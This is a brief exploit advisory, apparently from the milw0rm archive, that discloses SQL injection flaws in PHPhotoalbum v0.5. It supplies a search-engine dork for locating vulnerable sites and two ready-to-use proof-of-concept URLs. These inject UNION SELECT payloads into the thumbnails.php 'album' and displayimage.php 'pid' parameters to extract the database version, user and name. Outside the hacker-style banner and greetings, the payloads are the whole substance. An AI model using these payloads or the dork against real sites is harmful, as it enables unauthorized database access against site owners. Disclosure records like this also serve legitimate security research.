############################################################################### # # Name : PHPhotoalbum v0.5 Multiple Remote SQL Injection Vulnerabilities # Author : cOndemned # Dork : intext:PHPhotoalbum v0.5 # Greetz : ZaBeaTy, str0ke, TBH, Hawk, doctor, Sandtalker, Avantura ;** # ############################################################################### Proof of Concept : http://[host]/[path]/thumbnails.php?album=-1+union+select+concat_ws(0x10,now(),version(),user(),database())/* http://[host]/[path]/displayimage.php?pid=-1+union+select+1,2,3,now(),version(),user()/* ############################################################################### # # Together we stand tall, Not gonna crash, not gonna fall - Children of Bodom # ############################################################################### # milw0rm.com [2008-05-28]